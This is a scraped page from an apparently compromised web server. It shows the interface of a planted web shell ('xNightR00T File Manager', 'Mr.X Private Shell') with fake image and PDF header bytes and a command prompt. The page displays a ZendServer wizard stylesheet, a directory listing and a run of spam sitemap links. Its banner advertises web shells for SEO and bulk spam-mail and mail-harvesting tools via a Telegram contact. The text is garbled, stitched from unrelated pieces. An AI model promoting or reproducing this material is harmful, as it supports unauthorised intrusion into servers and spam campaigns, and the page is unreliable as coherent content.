xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
/* Styling of the form before 
   the FormWizard Transformation */
/*
form {
  width: auto;
  background: #fff;
  padding: 10px;
  border-top: 2px solid #717171;
  margin-bottom: 3em;
}
*/
.wizard-control-area {
/* the wizard-control-area shouldn't be 
   in the page before the FormWizard Invocation
   (IN THIS EXAMPLE). Let's hide it if it is not
   there */
    display: none;
}

fieldset p {
  /* margin-top: 2em; */
}

fieldset {
    vertical-align: middle;
    border: 1px solid #e3e3e3;
  /* margin: 5px 40px; */
    position: relative;
    background: #FCFCFC;
  /* padding: 1.5em 0.5em 1em 1em; */
}

fieldset h2,
fieldset h3 {
    font-variant: capitalize;
    font-size: larger;
    padding: 10px 0;
}

fieldset h2 {
    font-size: 18px;
}

fieldset h3 {
    font-size: 14px;
}

.simple-modal {
    background: #FCFCFC;
    border: 0;
    color: #3b3b3b;
    -webkit-box-shadow: 0px 9px 17px 0px rgba(50, 50, 50, 0.77);
    -moz-box-shadow: 0px 9px 17px 0px rgba(50, 50, 50, 0.77);
    box-shadow: 0px 9px 17px 0px rgba(50, 50, 50, 0.77);
}

.centered-container {
    width: 100%;
    text-align: center;
    margin-left: 0;
    margin-right: 0;
}

#confirmEmail {
    font-weight: bolder;
}

/* Styles applied to the form after 
   the FormWizard transformation */

.wizard {
    border: 1px solid black;
    padding: 0;
    width: auto;
    width: 600px;
    height: 320px;
    position: relative;
}

.wizard table td {
    padding: 5px;
}

#settingsSet {
    width: 450px;
	/* margin-bottom: 26px; */
}

#defineApplicationForm .zend-form-table tr td:first-child {
    text-align: right;
    width: 140px;
    display: inline-block;
}

#defineApplicationForm .zend-form-table select,
#defineApplicationForm .zend-form-table input[type="text"] {
    width: 200px;
}

.required-field {
    font-weight: bold;
}

.wizard .unwizarded-only {
    display: none;
}

.wizard-control-area, 
.wizard #controlArea {
    position: absolute;
    bottom: 0;
    background: #2774a0;
    border: 0;
    border-top: 1px solid #96a5ac;
    margin: 0;
    width: 100%;
    padding: 7px 0;
    text-align: center;
    display: block;
    height: 27px;
}

.wizard > fieldset,
.wizard > form > fieldset {
    border: 0;
    margin: 0;
}

.side-legend {
    display: none;
}

.wizard .side-legend {
    float: left;
    width: 220px;
    height: 386px;
    display: block;
    padding: 10px;
    margin: 13px;
    background: url('/ZendServer/images/wizard/sidebar_bg.png') top right;
    border: 1px solid #e6e6e6;
    box-sizing: content-box;
}

.wizard .side-legend ul {
    padding: 0;
    margin: 20px 0;
}

.wizard .side-legend h1 {
    color: #2774A0;
    font-size: 28px;
    font-weight: normal;
    margin-left: 3px;
}

.wizard .wizard-page {
    float: left;
    width: 532px;
    padding: 0 10px 0 0;
}

.side-legend li {
    width: 224px;
    height: 40px;
    position: relative;
    background: url('/ZendServer/images/wizard/sidebar-element-bg.png') top right;
}

.side-legend li.legend_item.active {
    background: url('/ZendServer/images/wizard/sidebar-element-active-bg.png') top right;
}

.side-legend li.disabled,
.side-legend li[disabled="disabled"] {
    background: url('/ZendServer/images/wizard/sidebar-element-disabled-bg.png') top right;
}

.side-legend li.glyphicons {
    padding: 0;
}

.side-legend li i:before {
    left: 13px;
    top: 12px;
    font-size: 18px;
    color: #666;
}

.side-legend li.disabled i:before,
.side-legend li[disabled="disabled"]  i:before {
    color: #B6BFC3;
}

.side-legend li h2, 
.simple-modal .simple-modal-body li h2 {
    font-size: 13px;
    color: #666666;
    font-weight: normal;
    line-height: 40px;
	/* text-indent: 15px; */
	/* padding-left: 27px; */
    display: inline-block;
}

.side-legend li.disabled h2,
.side-legend li[disabled="disabled"] h2 {
    color: #b6bfc3;
}

.wizard .item-selected-arrow {
    background: url('/ZendServer/images/wizard/blue-triangle-arrow.png') top right no-repeat;
    height: 23px;
    width: 9px;
    position: absolute;
    top: 0;
    right: -9px;
    z-index: 1;
    display: none;
}

.wizard .info-icon {
    background: url('/ZendServer/images/wizard/question-mark-icon-dark.png') top right no-repeat;
    height: 12px;
    width: 12px;
    display: inline-block;
}

.wizard #deployment-installation-top {
    width: 353px;
}

.wizard .application-installation-logo {
    max-height: 55px;
    max-width: 100px;
    float: right;
}

.wizard #deployment-installation-top table {
    width: 372px;
    float: left;
    margin: 0;
}

.wizard .item-selected-help {
    background: url('/ZendServer/images/wizard/question-mark-icon.png') top right no-repeat;
    height: 12px;
    width: 12px;
    position: absolute;
    top: 5px;
    right: -1px;
    z-index: 1;
    display: none;
}

.update-servers-list {
    height: 185px;
    overflow-y: auto;
}
.update-servers-type-option {
    padding-top: 5px;
    padding-bottom: 5px;
}
.update-servers-list-curtain {
    position: absolute;
    width: 100%;
    height: 185px;
    overflow: hidden;
    background: #FFF;
    opacity: 0.85;
}
.ui-grid-table-icon {
    width: 14px;
    height: 14px;
    display: inline-block;
}
.nodes-list-cell {
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
}

.wizard-current-0 #sl0,
.wizard-current-1 #sl1,
.wizard-current-2 #sl2,
.wizard-current-3 #sl3, 
.wizard-current-4 #sl4,
.wizard-current-5 #sl5,
.wizard-current-6 #sl6,
.wizard-current-7 #sl7 {
    background: url('/ZendServer/images/wizard/sidebar-element-active-bg.png') top right;
}

.wizard-current-0 #sl0 .item-selected-help,
.wizard-current-1 #sl1 .item-selected-help,
.wizard-current-2 #sl2 .item-selected-help,
.wizard-current-3 #sl3 .item-selected-help, 
.wizard-current-4 #sl4 .item-selected-help,
.wizard-current-5 #sl5 .item-selected-help,
.wizard-current-6 #sl6 .item-selected-help,
.wizard-current-7 #sl7 .item-selected-help {
    display: block;
}

.wizard-current-first button.wizard-control-backward,
.wizard-current-last button.wizard-control-forward {
    visibility: hidden;
    display: none;
}

#authentication-settings-box, #deploymentWizard, #selective-access-box {
    width: 815px;
    height: 474px;
    border: 0px;
}

#defineWizard {
    width: 671px;
    height: 474px;
    border: 1px solid #000;
}

.wizard-title {
    display: none;
    height: 24px;
    font-size: 12px;
    font-weight: bold;
    color: #cddce2;
    background: #074f6d;
    line-height: 24px;
    padding-left: 5px;
}

.wizard-title.chart-wizard-title {
    display: block;
}

#wizard-control-forward {
    float: right;
    margin-right: 10px;
}

#wizard-control-backward,
#wizard-control-submit {
    margin: 0 3px;
    float: right;
}

#wizard-control-submit {
    display: none;
    margin-right: 10px;
}

#wizard-control-cancel {
    float: left;
    margin-left: 14px;
}

.wizard-page .page-wrapper {
    width: 100%;
    height: 416px;
    overflow-x: hidden;
    overflow-y: auto;
    padding: 10px 0 0 0;
}

.wizard-page code, .wizard-page pre {
    word-wrap: break-word;
    white-space: pre-wrap;
}

.wizard-page#licenseAgreementPage dd {
    margin: 0;
}

.wizard-page #readmeContent dd {
    margin-left: 12px;
    margin-right: 20px;
}

.wizard-page #eulaContent,
.wizard-page #readmeContent,
.wizard-page #licenseAgreementContent {
	width: 500px;
    height: 282px;
    margin-bottom: 10px;
}

#bootstrapWizard .wizard-page #eulaContent,
#bootstrapWizard .wizard-page #readmeContent,
#bootstrapWizard .wizard-page #licenseAgreementContent {
    width: 98%;
 /* Bootstrap wizard */
    height: 342px;
}
/* REMOVE AFTER ADD NEW APPLICATION PAGE*/
.wizard-page #accept-terms-label {
    float: right;
    text-align: left;
    width: 444px;
}

.wizard-page #accept-terms {
    float: left;
}

/*EOF REMOVE */
.wizard-page #eulaContent {
    resize: none;
    font-family: Arial, Helvetica, sans-serif;
    font-size: 12px;
}

.wizard-page h2,
.wizard-page h3 {
    color: #96a5ac;
}

.wizard-page h2 {
    font-size: 18px;
    color: #2774A0;
    font-weight: normal;
}

.wizard-page h3 {
    font-size: 14px;
    font-weight: bold;
}

.wizard-page p {
    color: #3b3b3b;
    line-height: 16px;
    font-size: 12px;
}

.wizard-page #summaryContent {
    position: relative;
}

.wizard-page .application-wizard-logo {
    top: 0px;
    max-height: 55px;
    max-width: 100px;
}

.wizard-page .application-user-params {
}

.wizard-page .application-user-params dt {
    display: inline-block;
    width: 36%;
    margin: 10px 0 0 0;
    padding-right: 10px;
    text-align: right;
    vertical-align: top;
    color: #93A3AB;
    font-size: 13px;
    font-weight: bold;
}

.wizard-page .application-user-params dd {
    display: inline-block;
    width: 60%;
    margin: 10px 0 0 0;
    text-align: left;
    vertical-align: top;
}

#defineError {
    display: block;
    max-width: 230px;
    margin: 5px 0;
    padding: 0;
    text-align: left;
    color: red;
    vertical-align: top;
}

.wizard-page .application-user-params dd .errors {
    display: block;
    max-width: 230px;
    margin: 5px 0;
    padding: 0;
    text-align: left;
    color: red;
    vertical-align: top;
}

.wizard-page .application-user-params .description {
    display: none;
}

.wizard-page .application-user-params input[type="text"], 
.wizard-page .application-user-params input[type="password"], 
.wizard-page .application-user-params input[type="email"], 
.wizard-page .application-user-params select {
    width: 150px;
}

.wizard-page .application-user-params input[readonly] {
    color: gray;
}

#deployment-set-installation table tr td:first-child {
    width: 100px;
}

#deployment-set-installation input {
    width: 220px;
}

#deployment-set-installation select {
    width: 150px;
}

.wizard .section {
    width: 73px;
}

#default-server-message, .default-server-message,
.default-template-message {
    padding-left: 25px;
    margin-top: 7px;
    font-style: italic;
    position: relative;
    color: #525252;
}

#default-server-message, .default-server-message {
    margin-left: 20px;
}

.wizard #default-server-message:before,
.wizard .default-server-message:before,
.wizard .default-template-message:before {
    content: "\e197";
    font: 24px/1em 'Glyphicons Regular';
    font-style: normal;
    color: #1D1D1B;
    font-size: 15px;
    position: absolute;
    top: 10px;
    left: 2px;
    color: #525252;
}

.wizard .default-server-message {
    background: none;
}

#summaryPage #default-server-message {
    background-color: #e4f5ff;
    border: 1px solid #bce8f1;
    margin: 0;
    margin-bottom: 10px;
    padding: 5px 5px 5px 35px;
    width: 65%;
}

#summaryPage #default-server-message:before {
    left: 10px;
    top: 17px;
    color: #2774a0;
}

.server-warning-message {
    background: #FFF7C9;
    border: 1px solid #CFC799;
    margin-right: 20px;
    margin-left: 20px;
    padding: 5px 10px;
}

#devbar-message {
    padding-left: 25px;
    padding-right: 25px;
    margin-left: 15px;
    margin-top: 7px;
    font-style: italic;
    position: absolute;
    bottom: 25px;
    background: url('/ZendServer/images/apps-status-warning.png') left 2px no-repeat;
}

#devbar-message.enabledStatus {
    background: url('/ZendServer/images/apps-status-ok.png') left 2px no-repeat;
}
/* in the summary and prereq pages */
.wizard-display-list h2 {
    font-size: 16px;
    color: #96a5ac;
}

.wizard-display-list {
    color: #3b5866;
}

#defineApplicationForm table {
    margin-bottom: 0;
}

#define-wizard-logo-label {
    color: #3b3b3b;
    float: left;
    margin: 15px 0 0 -13px;
    width: 142px;
    text-align: right;
    padding-right: 40px;
}

#define-wizard-uploader-wrapper input[type="file"] {
    width: 235px;
    float: left;
    margin-top: 12px;
}

#define-wizard-uploader-wrapper #droppable {
    margin-top: 10px;
    margin-left: 10px;
    float: left;
    clear: both;
    width: 83%;
}

#defineWizard .wizard-page .page-wrapper {
    overflow: hidden;
}

.zend-form-deploy-wizard .error-wrapper ul {
    margin: 0 0 0 2px;
    list-style-type: none;
    padding: 0;
    font-size: 11px;
    color: #FF5400;
}

.wizard .message-box {
    border-radius: 0;
    padding-left: 10px;
    font-weight: normal;
    font-size: 12px;
}

.wizard .message-box.ok {
    background: #d9edf7;
    border-color: #bce8f1;
    color: #2774a0;
}

.wizard .message-box.ok:before {
    content: 'Success!';
    font-weight: bold;
    margin-right: 10px;
}

.wizard .message-box.error {
    background: #FFEEE5;
    border-color: #FF5400;
    color: #FF5400;
}

.wizard .message-box.error:before {
    content: 'Error!';
    font-weight: bold;
    margin-right: 10px;
}

.wizard .message-box.notice {
    background: #FFEEE5;
    border: 1px solid #E88D00;
    color: #E88D00;
}

.wizard .message-box.notice:before {
    content: 'Notice!';
    font-weight: bold;
    margin-right: 10px;
}

.simple-modal.hide-header .simple-modal-header {
    height: 0;
}

.simple-modal .simple-modal-body h2,
.ngdialog .ngdialog-page h2 {
    margin-bottom: 10px;
    color: #2774A0;
    font-weight: normal;
    font-size: 18px;
    word-break: break-word;
}

.simple-modal .simple-modal-body>h2,
.ngdialog .ngdialog-content>h2,
.ngdialog .ngdialog-content .content-padded>h2 {
    font-weight: 600;
}

#selective-access-box.wizard fieldset.wizard-page div.page-wrapper {
    width: 535px;
    height: 400px;
}

.ngdialog.ngdialog-theme-default .ngdialog-content .divKey {
	padding-bottom: 10px;
	padding-top: 10px;
	padding-left: 15px;
}

.ngdialog.ngdialog-theme-default .ngdialog-content label {
	padding-right: 10px;
}
.ngdialog.ngdialog-theme-default .ngdialog-content .wizard-input-error {
	border: 1px solid #C11;
}

/* Some corrections for the VHost wizard */
.ngdialog.ngdialog-theme-default .ngdialog-content .vhost-wizard .vhost-small-informative-text {
	font-size: 12px;
	padding-bottom: 20px;
}

.ngdialog.ngdialog-theme-default .ngdialog-content .vhost-wizard .vhost-required-field {
	color: #C11;
	cursor: help;
}
.ngdialog.ngdialog-theme-default .ngdialog-content .vhost-wizard .required-fields-label {
	font-size: 10px;
	color: #C11;
}
.ngdialog.ngdialog-theme-default .ngdialog-content .vhost-wizard label {
	font-weight: normal;
	font-size: 12px;
}
.ngdialog.ngdialog-theme-default .ngdialog-content .vhost-wizard input {
	width: initial;
}
.ngdialog.ngdialog-theme-default .ngdialog-content .vhost-wizard label.vhost-form-label {
	display: inline-block;
	width: 120px;
}
.ngdialog.ngdialog-theme-default .ngdialog-content .vhost-wizard .form_field {
	margin-bottom: 10px;
}
.ngdialog.ngdialog-theme-default .ngdialog-content .vhost-wizard .vhost-errors {
	font-size: 12px;
	color: #C11; 
	display: inline-block;
	margin-left: 10px;
}
.ngdialog.ngdialog-theme-default .ngdialog-content .vhost-wizard input[type="radio"] {
	vertical-align: middle;
}
.ngdialog.ngdialog-theme-default .ngdialog-content .vhost-wizard .vhost-info-message {
	font-style: italic;
	color: #666;
}
.ngdialog.ngdialog-theme-default .ngdialog-content .vhost-wizard .vhost-info-sign {
	float: left; 
	color: #2774A0; 
	margin-right: 10px; 
	height: 30px;
}
.ngdialog.ngdialog-theme-default .ngdialog-content .vhost-wizard .vhost-wizard-template {
	padding: 10px;
	overflow: auto;
	font-size: 12px;
	line-height: 15px;
	border: 1px solid #ccc;
	box-sizing: border-box;
	font-size: 12px;
	font-family: consolas, monospace;
	height: 200px;
	width: 100%;
}
.ngdialog.ngdialog-theme-default .ngdialog-content .vhost-wizard .vhost-validation-error {
	padding: 10px 15px;
	color: #C11;
}

Filemanager

Name Type Size Permission Actions
devbar Folder 0755
admin.css File 10.21 KB 0644
appList.css File 3.72 KB 0644
azure.css File 89 B 0644
bootstrap.css File 3.09 KB 0644
charts.css File 267 B 0644
codetracing.css File 11.04 KB 0644
configImport.css File 277 B 0644
configuration.css File 4.1 KB 0644
dashboard.css File 19 B 0644
datepicker_dashboard.css File 5.42 KB 0644
dcpulse.css File 7.75 KB 0644
devbar-azure.css File 3.04 KB 0644
devbar-embedded.css File 28.83 KB 0644
devbar-iframe.css File 4.09 KB 0644
devbar-zray-standalone.css File 1.56 KB 0644
devbar.css File 150.63 KB 0644
error.css File 936 B 0644
events.css File 244 B 0644
expired.css File 6.84 KB 0644
filter.css File 7.95 KB 0644
glyphicons.css File 45.76 KB 0644
guidePageZrayStandalone.css File 1.26 KB 0644
guidepage.css File 16.6 KB 0644
history.css File 6.39 KB 0644
icons.css File 1.12 KB 0644
ipwidget.css File 98 B 0644
issueDetails.css File 3.65 KB 0644
jobqueue_settings.css File 448 B 0644
jobs.css File 1.53 KB 0644
jqpulse.css File 13.77 KB 0644
layout.css File 12.83 KB 0644
libsList.css File 508 B 0644
license.css File 2.48 KB 0644
login.css File 5.09 KB 0644
logs.css File 6.97 KB 0644
monitor-rules.css File 1.37 KB 0644
monitor-settings.css File 1013 B 0644
monitorRule.css File 6.43 KB 0644
pageCache.css File 4.47 KB 0644
plugins.css File 13.78 KB 0644
prereq.css File 519 B 0644
recurringJob.css File 2.43 KB 0644
rulesList.css File 1.14 KB 0644
serverInfo.css File 1.49 KB 0644
servers.css File 607 B 0644
sessionClustering.css File 704 B 0644
simplemodal.css File 975 B 0644
spinner-input.css File 765 B 0644
spinner.css File 1.3 KB 0644
studio.css File 17.42 KB 0644
style.css File 82.54 KB 0644
tags.css File 477 B 0644
toast.css File 1.84 KB 0644
ui-grid-zs.css File 5.07 KB 0644
uploader.css File 1.78 KB 0644
urlinsight.css File 16.69 KB 0644
urlinsightRules.css File 357 B 0644
vhosts.css File 7.26 KB 0644
webApi.css File 251 B 0644
wizard.css File 15.21 KB 0644
z-ray-libs.css File 210.67 KB 0644
z-ray-libs.min.css File 187.41 KB 0644
zgrid.css File 13.86 KB 0644
zmenu.css File 763 B 0644
zray-standalone.css File 810 B 0644
zs-reset.css File 5.56 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml